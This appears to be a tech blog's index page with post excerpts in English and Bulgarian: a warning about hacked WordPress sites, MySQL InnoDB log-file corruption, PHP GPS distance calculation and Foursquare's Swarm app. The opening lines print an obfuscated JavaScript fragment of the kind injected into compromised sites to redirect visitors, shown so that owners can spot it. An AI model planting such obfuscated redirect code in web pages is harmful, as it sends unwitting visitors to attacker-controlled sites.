document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));

This is some code that you can find in your js files leading visitor redirects to other websites.

Probably you have been hacked and somebody inserted some code in your wordpress installation.

Continue reading

Честито! 🙂

Може би имате сериозен проблем с mysql, който може да се степенува в скалата от 1 до 6, където 6 не е отлечен 🙂 а точно обратното. (ще стане ясно защо малко по-долу)

Наскоро се сблъсках точно с този проблем при стартирането на база данни с InnoDB таблици. При мен проблема се оказа в следствие с неточност при записването на логовете в “ib_logfile”. Проблема може да е в следсвие на неправилно спиране на сървъра или проблем с хард диска, или пък нещо различно, което е свързано с процеса за писане във файла като цяло. Аз лично смятам, че е заради принудително спиране на сървъра, тъй като проблема се яви на Development машина, която като цяло бива спирана от време на време по този начин.

Continue reading

Кратък код, който можете да използвате, ако искате да пресметнете разстоянието между два GPS координата с PHP. Предвид навлизането на мобилните устройсва и широкото распространение на PHP / MySQL рано или късно може да се наложи 🙂

Continue reading

Преди около месец Foursquare ме изненада, като ме накара да инсталирам ново приложение, за да мога да продължа да се check-вам на местата, които посещавам.

Първото, което ми хрумна беше, че са решили да променят gamification-а, като подобрят цялостното потребителско преживяване или нещо от този сорт, карайки ме да инсталирам Swarm. Реално от Facebook по подобен модел отделиха Messenger-a в отделна апликация, която определено ползвам и намирам за успешна и удобна.

Continue reading